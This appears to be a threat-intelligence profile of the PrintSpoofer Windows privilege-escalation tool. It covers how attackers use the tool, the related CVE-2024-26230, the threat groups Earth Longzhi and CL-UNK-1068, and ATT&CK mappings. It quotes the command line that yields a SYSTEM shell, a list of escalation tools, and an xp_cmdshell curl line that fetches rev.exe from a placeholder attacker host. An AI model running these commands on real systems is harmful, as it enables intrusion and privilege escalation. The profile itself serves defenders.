Mallory
Malware · Used by 2 actors · Exploits 1 CVE

PrintSpoofer

PrintSpoofer is a Windows local privilege-escalation tool used to elevate execution to NT AUTHORITY\SYSTEM by abusing token impersonation when SeImpersonatePrivilege is available. The source material describes it being used to abuse SeImpersonatePrivilege on Windows Server 2016 and to escalate from lower-privileged service contexts, such as IIS application pool identities and NT AUTHORITY\Network Service, to SYSTEM. It is referenced alongside other privilege-escalation tooling such as PrintNightmare.

Observed usage in the source material is post-compromise rather than initial access. In one walkthrough, an attacker obtained code execution as iis apppool\defaultapppool, confirmed SeImpersonatePrivilege with whoami /priv, downloaded PrintSpoofer64.exe, and executed it with '-i -c cmd' to obtain a SYSTEM shell. In another exploit chain involving CVE-2024-26230 in the Windows Telephony Service, a malicious DLL yielded NT AUTHORITY\Network Service execution, after which PrintSpoofer was used to escalate further to NT AUTHORITY\SYSTEM because the service token held SeImpersonatePrivilege.

The source material also ties PrintSpoofer to multiple threat activity clusters. Palo Alto Networks Unit 42 reported CL-UNK-1068 using PrintSpoofer in intrusions targeting high-value organizations across South, Southeast, and East Asia, including the aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors. In those intrusions, PrintSpoofer appeared among payloads executed via DLL side-loading with legitimate Python executables, alongside FRP and the custom Go-based scanner ScanPortPlus. Separate reporting states that Earth Longzhi, a subgroup of APT41, used PrintSpoofer during post-exploitation in campaigns from 2020 to 2022 targeting sectors including government, healthcare, infrastructure, banking, defense, aviation, insurance, and urban development across Taiwan and other Asia-Pacific countries.

High-confidence indicators and execution details mentioned directly in the source material are the binary name PrintSpoofer64.exe and the command line 'PrintSpoofer64.exe -i -c cmd'.


Exploited CVEs

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

CVE-2024-26230: Windows Telephony Service (TapiSrv) Elevation of Privilege (Use-After-Free)

CVE-2024-26230 is a critical vulnerability found in the Windows Telephony Service (TapiSrv), which can lead to an elevation of privilege on affected systems. The exploit leverages a use-after-free in FreeDialogInstance.

Source: STAR Labs SG (starlabs.sg)
Threat Actors

Groups observed using it: 2 distinct threat actors attributed by public researchers.

Earth Longzhi

During the investigation of the second campaign, we collected multiple hacking tools used for privilege escalation (PrintNightmare and PrintSpoofer)

Source: Trend Micro Research (trendmicro.com)
CL-UNK-1068

“The attackers used this technique to load and execute several tools as payloads, including FRP, PrintSpoofer…”

Source: Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
MITRE ATT&CK Techniques & Procedures

5 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

1 technique
T1574.001 DLL (evidence: 1)

“use of legitimate Python executables to launch DLL side-loading attacks… python.exe… alongside a malicious side-loaded DLL… python20.dll… loader reads… shellcode… executes… in memory.”

Privilege Escalation

3 techniques
T1068 Exploitation for Privilege Escalation (evidence: 4)

we collected multiple hacking tools used for privilege escalation (PrintNightmare and PrintSpoofer)

T1134 Access Token Manipulation (evidence: 3)

In this case, we can achieve higher privilege by using PrintSpoofer exploit to leverage to NT Authority/System.

T1548 Abuse Elevation Control Mechanism (evidence: 1)

Local Windows winPEAS PowerUp Seatbelt Unquoted svc paths DLL hijack AlwaysInstallElevated JuicyPotato RoguePotato PrintSpoofer GodPotato UAC fodhelper/sdclt

Stealth

2 techniques
T1134 Access Token Manipulation (evidence: 3)

In this case, we can achieve higher privilege by using PrintSpoofer exploit to leverage to NT Authority/System.

T1574.001 DLL (evidence: 1)

“use of legitimate Python executables to launch DLL side-loading attacks… python.exe… alongside a malicious side-loaded DLL… python20.dll… loader reads… shellcode… executes… in memory.”

Command and Control

1 technique
T1105 Ingress Tool Transfer (evidence: 2)

xp_cmdshell "curl http://<ATTACKER IP>/rev.exe -o C:\temp\rev.exe" ... After transferring PrintSpoofer64.exe over
